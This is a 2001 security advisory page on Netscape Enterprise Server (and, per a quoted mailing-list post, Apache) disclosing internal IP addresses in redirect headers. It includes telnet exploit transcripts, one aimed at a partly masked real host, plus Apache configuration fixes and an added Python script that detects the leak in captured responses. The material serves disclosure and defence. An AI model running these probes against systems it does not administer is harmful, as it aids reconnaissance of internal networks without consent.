SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Web Server/CGI) > Enterprise Server (Netscape)
Vendors:  Netscape
Netscape Enterprise Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
SecurityTracker Alert ID:  1002189
SecurityTracker URL:  http://securitytracker.com/id/1002189
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 13 2001
Impact:   Disclosure of system information


Description:   It is reported that the Netscape Enterprise web server may disclose internal IP addresses used by the web server to remote users.

The following exploit transcript demonstrates the issue, where internal IP addresses used by the web server are displayed in the 'location' field:

telnet [targethost] 80

Trying XXX.XXX.XXX.XX...
Connected to [targethost]
Escape character is '^]'.
GET /images HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 10 Aug 2001 07:10:32 GMT
Location: http://172.16.128.117/images/
Content-length: 0
Content-type: text/html
Connection: close

Connection closed by foreign host.

Impact:   A remote user can obtain internal IP addresses used by the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  home.netscape.com/enterprise/v3.6/index.html
Cause:   State error
Underlying OS:  UNIX (AIX), UNIX (HP/UX), UNIX (SGI/IRIX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Re: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


This problem also affects Apache, Netscape Enterprise Server, 
and probably many others.

Apache responds this way if the ServerName directive is not
set (or is set to the internal IP) and the UseCanonicalName 
option is On (which is the default configuration).  

From Apache 1.3.x httpd.conf:

# UseCanonicalName:  (new for 1.3)  With this setting turned on, whenever
# Apache needs to construct a self-referencing URL (a URL that refers back
# to the server the response is coming from) it will use ServerName and
# Port to form a "canonical" name.  With this setting off, Apache will
# use the hostname:port that the client supplied, when possible.  This
# also affects SERVER_NAME and SERVER_PORT in CGI scripts.
#
UseCanonicalName Off

If ServerName is not set, the system will redirect users to what it 
thinks its hostname is (hostname.local, host.internal.net, etc). The
fix is to either set CanonicalName to Off or set the ServerName 
variable to the external hostname.

I don't have a local NES system to check, but this demonstrates this
problem fairly effectively ;)

telnet www.verXXXgn.com 80
Trying 216.1X8.XXX.XX...
Connected to the.warmfuzzyofinternettrust.com.
Escape character is '^]'.
GET /images HTTP/1.0
 
HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 10 Aug 2001 07:10:32 GMT
Location: http://172.16.128.117/images/
Content-length: 0
Content-type: text/html
Connection: close
 
Connection closed by foreign host.

On Thu, 9 Aug 2001 13:22:39 -0700
"Marc Maiffret" <marc@eeye.com> wrote:

> This isn't just for HTTPS... this can occur on plain HTTP also depending on
> how someone has set up. If you have an IIS web server you should not use "all
> ip addresses" for a web and instead pick the specific IP so that way IIS
> does not accidentally return internal IPs etc....
> 
> Signed,
> Marc Maiffret
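The advisory transcript and the Apache discussion in the source message both come down to one check a server administrator can run: when a request for a directory without its trailing slash produces a 302, does the Location header name an address or hostname the server should not be publishing? The following Python script is an added example, not code from the advisory, the mailing-list post, or Netscape/Apache; it parses a captured HTTP response and classifies the host in its Location header. The sample responses are constructed (the first reuses the Location value shown in the transcript above), and www.example.com is an assumed stand-in for the server's public hostname.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample responses, not captured from any live host. The first
# mirrors the advisory's transcript: a 302 whose Location carries the
# server's internal RFC 1918 address. The second shows the same redirect
# once the server has been configured with its public canonical name.
LEAKY_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Server: Netscape-Enterprise/3.6 SP3\r\n"
    b"Date: Fri, 10 Aug 2001 07:10:32 GMT\r\n"
    b"Location: http://172.16.128.117/images/\r\n"
    b"Content-length: 0\r\n"
    b"Content-type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)
FIXED_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Location: http://www.example.com/images/\r\n"
    b"Content-length: 0\r\n"
    b"\r\n"
)
# The hostname flavour of the leak described for Apache: ServerName unset,
# so the machine's own (internal) name ends up in the redirect.
INTERNAL_NAME_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Location: http://host.internal.net/images/\r\n"
    b"\r\n"
)

REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_head(raw):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased. Any body is ignored; the check only
    needs the status line and the Location header.
    """
    head = raw.replace(b"\r\n", b"\n").partition(b"\n\n")[0]
    lines = head.decode("iso-8859-1").split("\n")
    parts = lines[0].split(None, 2)
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return code, headers


def classify_redirect(raw, expected_host):
    """Return (verdict, host) for one captured response.

    Verdicts:
      "no-redirect"        not a 3xx with a Location header; nothing to inspect
      "relative"           Location has no host part, so no addressing is disclosed
      "leaks-internal-ip"  Location names a private, loopback or link-local address
      "non-canonical-host" Location names a host other than the public name the
                           client asked for (internal DNS name, bare hostname, or
                           a public IP instead of the name)
      "ok"                 Location uses the expected public hostname
    """
    code, headers = parse_head(raw)
    location = headers.get("location")
    if code not in REDIRECT_CODES or location is None:
        return "no-redirect", None
    host = urlsplit(location).hostname
    if host is None:
        return "relative", None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # a hostname rather than a literal address
    if addr is not None and (addr.is_private or addr.is_loopback or addr.is_link_local):
        return "leaks-internal-ip", host
    if host.lower() != expected_host.lower():
        return "non-canonical-host", host
    return "ok", host


if __name__ == "__main__":
    samples = [("leaky", LEAKY_RESPONSE), ("fixed", FIXED_RESPONSE),
               ("internal-name", INTERNAL_NAME_RESPONSE)]
    for label, raw in samples:
        print(label, classify_redirect(raw, "www.example.com"))
```

To use it on a real server you administer, capture the response to a directory request without the trailing slash (as in the transcript) and pass the bytes to classify_redirect along with the hostname clients are supposed to see. A "leaks-internal-ip" or "non-canonical-host" verdict on Apache points at exactly the configuration the post describes: set ServerName to the external hostname or turn UseCanonicalName off. The check deliberately treats a public IP literal as non-canonical too, since a redirect should carry the published name, not whatever address the server happens to be bound to.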


Copyright 2021, SecurityGlobal.net LLC